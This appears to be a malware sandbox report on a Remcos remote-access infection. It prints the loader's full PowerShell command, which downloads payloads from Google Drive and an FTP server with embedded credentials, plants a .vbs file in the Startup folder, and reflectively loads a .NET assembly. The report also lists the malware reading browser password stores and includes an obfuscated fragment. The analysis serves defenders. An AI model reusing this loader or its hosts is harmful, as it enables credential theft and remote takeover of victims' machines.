'' + [char]65 + 'b' + [char]65 + 'bs' + [char]65 + 'hu' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'bl' + [char]65 + 'gs' + [char]65 + 'bwb2' + [char]65 + 'g4' + [char]65 + 'sq' + [char]65 + 'u' + [char]65 + 'ck' + [char]65 + 'i' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'ek' + [char]65 + 'vgbg' + [char]65 + 'hi' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'bk' + [char]65 + 'g8' + [char]65 + 'a' + [char]65 + 'b0' + [char]65 + 'gu' + [char]65 + 'tqb0' + [char]65 + 'gu' + [char]65 + 'rw' + [char]65 + 'u' + [char]65 + 'ck' + [char]65 + 'jw' + [char]65 + 'x' + [char]65 + 'hm' + [char]65 + 'cwbh' + [char]65 + 'gw' + [char]65 + 'qw' + [char]65 + 'u' + [char]65 + 'dm' + [char]65 + 'eqby' + [char]65 + 'ge' + [char]65 + 'cgbi' + [char]65 + 'gk' + [char]65 + 't' + [char]65 + 'bz' + [char]65 + 'hm' + [char]65 + 'yqbs' + [char]65 + 'em' + [char]65 + 'jw' + [char]65 + 'o' + [char]65 + 'gu' + [char]65 + 'c' + [char]65 + 'b5' + [char]65 + 'fq' + [ch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "; $jwral = $host.version.major.equals(2) ;if ( $jwral ) {$uvhrt = [system.io.path]::gettemppath();del ( $uvhrt + '\upwin.msu' );$faqoi = 'https://drive.google.com/uc?export=download&id=';$jwemr = $env:processor_architecture.contains('64') ;if ( $jwemr ) {$faqoi = ($faqoi + '1naqdnxigvi_q1rpkazftmygmaqtjxu42') ;}else {$faqoi = ($faqoi + '1g1jmxusx9mc9vmhvrjj2xofz3ak_clot') ;};$yfepp = (new-object net.webclient);$yfepp.encoding = [system.text.encoding]::utf8;$yfepp.downloadfile($urlkb, $uvhrt + '\upwin.msu');$mynkz = ('c:\users\' + [environment]::username );riwcg = ($uvhrt + '\upwin.msu'); powershell.exe wusa.exe riwcg /quiet /norestart ; copy-item 'c:\users\user\desktop\skmbt_77122012816310td0128_17311_xls.vbs' -destination ( $mynkz + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$lbczsg;$mjdqf = (new-object net.webclient);$mjdqf.encoding = [system.text.encoding]::utf8;$mjdqf.credentials = new-object system.net.networkcredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578jp@@');$lbczsg = $mjdqf.downloadstring( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/upcrypter/01/dll01.txt' );$mjdqf.dispose();$mjdqf = (new-object net.webclient);$mjdqf.encoding = [system.text.encoding]::utf8;$lbczsg = $mjdqf.downloadstring( $lbczsg );$huupx = 'c:\users\user\desktop\skmbt_77122012816310td0128_17311_xls.vbs';[byte[]] $acbcz = [system.convert]::frombase64string( $lbczsg.replace( '?:?' 
, 'a' ) );[system.appdomain]::currentdomain.load( $acbcz ).gettype('classlibrary3.class1').getmethod( 'prfvi' ).invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huupx , 'd dd' ) );};"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 20_2_00434CB6 cpuid 20_2_00434CB6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: EnumSystemLocalesW,20_2_0045201B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: EnumSystemLocalesW,20_2_004520B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,20_2_00452143
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: GetLocaleInfoW,20_2_00452393
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: EnumSystemLocalesW,20_2_00448484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,20_2_004524BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: GetLocaleInfoW,20_2_004525C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,20_2_00452690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: GetLocaleInfoW,20_2_0044896D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: GetLocaleInfoA,20_2_0040F90C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,20_2_00451D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: EnumSystemLocalesW,20_2_00451FD0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 20_2_0041A045 __EH_prolog,GdiplusStartup,CreateDirectoryW,Sleep,Sleep,GetLocalTime,Sleep,20_2_0041A045
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 20_2_0041B69E GetUserNameW,20_2_0041B69E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: 20_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,20_2_00449210
                    Source: C:\Windows\System32\wscript.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match  File source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 23.2.powershell.exe.23e13f69f58.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 13.2.powershell.exe.1eb5d86a448.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 18.2.powershell.exe.19971c2ad28.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 0000000F.00000002.3436475205.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR
                    Source: Yara match  File source: C:\ProgramData\1210\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data  20_2_0040BA4D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\  20_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: \key3.db  20_2_0040BB6B

                    Remote Access Functionality

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Mutex created: \Sessions\1\BaseNamedObjects\Rmc-52K54M
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Mutex created: \Sessions\1\BaseNamedObjects\Rmc-52K54M
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Mutex created: \Sessions\1\BaseNamedObjects\Rmc-52K54M
                    Source: Yara match  File source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 23.2.powershell.exe.23e13f69f58.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 13.2.powershell.exe.1eb5d86a448.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 18.2.powershell.exe.19971c2ad28.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 0000000F.00000002.3436475205.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR
                    Source: Yara match  File source: C:\ProgramData\1210\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: cmd.exe  20_2_0040569A
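The two sections above list the host artifacts RegAsm.exe produced once the Remcos payload was injected into it: the `Rmc-` mutex, the keylog file under C:\ProgramData, and code paths that read the Chrome `Login Data` store and the Firefox profile's `key3.db`, together with the loader's copy of the .vbs into the Startup folder. The Python below turns those artifacts into host-triage rules and runs them over constructed events. It is an added example written for this page, not the report's own logic and not a vendor detection rule; the event records and their field names (image, type, target) are an assumption about what a Sysmon-style source would provide, and the Firefox rule is extended to the current key4.db and logins.json names, which the report does not mention.

```python
"""Host-triage rules derived from the Remcos artifacts listed above.

Added example for this page (not the report's logic, not a vendor rule set).
Event records are constructed; the field names image/type/target are an
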